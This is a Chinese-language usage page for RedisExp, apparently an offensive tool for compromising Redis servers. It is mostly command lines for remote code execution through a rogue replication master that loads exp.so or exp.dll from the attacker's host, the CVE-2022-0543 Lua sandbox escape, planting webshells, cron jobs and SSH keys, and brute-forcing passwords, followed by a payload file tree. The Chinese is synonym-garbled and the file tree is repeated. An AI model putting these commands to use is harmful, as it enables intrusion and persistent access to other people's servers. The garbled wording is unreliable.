快速利用:RedisExp ██████╗ ███████╗██████╗ ██╗███████╗ ███████╗██╗ ██╗██████╗ ██╔══██╗██╔════╝██╔══██╗██║██╔════╝ ██╔════╝╚██╗██╔╝██╔══██╗ ██████╔╝█████╗ ██║ ██║██║███████╗ █████╗ ╚███╔╝ ██████╔╝ ██╔══██╗██╔══╝ ██║ ██║██║╚════██║ ██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║███████╗██████╔╝██║███████║ ███████╗██╔╝ ██╗██║ ╚═╝ ╚═╝╚══════╝╚═════╝ ╚═╝╚══════╝ ╚══════╝╚═╝ ╚═╝╚═╝ 2022/05/23 23:36:54 [+] -h 靓仔检察下协助吧 Example: 主从复造号令施行: RedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -exec RedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -exec -console Linux: RedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -exec -so exp.so RedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -exec -console -so exp.so 主从复造文件上传: RedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -rfile dump.rdb -lfile dump.rdb -upload 自动封闭主从复造: RedisExp.exe -rhost 192.168.211.131 -slaveof Lua沙盒绕过号令施行 CVE-2022-0543: RedisExp.exe -rhost 192.168.211.131 -lua -console 备份写 Webshell: RedisExp.exe -rhost 192.168.211.131 -shell Linux 写方案使命: RedisExp.exe -rhost 192.168.211.131 -crontab Linux 写 SSH 公钥: RedisExp.exe -rhost 192.168.211.131 -ssh 爆破 Redis 暗码: RedisExp.exe -rhost 192.168.211.131 -brute -pwdf ../pass.txt 施行 Redis 号令: RedisExp.exe -rhost 192.168.211.131 -cli 导出 Redis 数据: RedisExp.exe -rhost 192.168.211.131 -dump 导进 Redis 数据: RedisExp.exe -rhost 192.168.211.131 -import cmd ├── crontab.txt 默许写进的Linux下的crontab按时使命文件,用前需求修正 ├── exp.dll 默许导进的Windows Redis模块 ├── exp.so 导进的Linux Redis模块 ├── main.go 编译进犯主法式 ├── out.json 导出导进的 Redis 数据 ├── pass.txt 爆破字典 ├── shell.txt 默许写进的 Webshell 文件,用前需求修正 └── ssh.txt 默许写进的Linux下的ssh公钥文件,用前需求修正 默许写进的Linux下的crontab按时使命文件,用前需求修正 ├── exp.dll 默许导进的Windows Redis模块 ├── exp.so 导进的Linux Redis模块 ├── main.go 编译进犯主法式 ├── out.json 导出导进的 Redis 数据 ├── pass.txt 爆破字典 ├── shell.txt 默许写进的 Webshell 文件,用前需求修正 └── ssh.txt 默许写进的Linux下的ssh公钥文件,用前需求修正 堆栈地点
|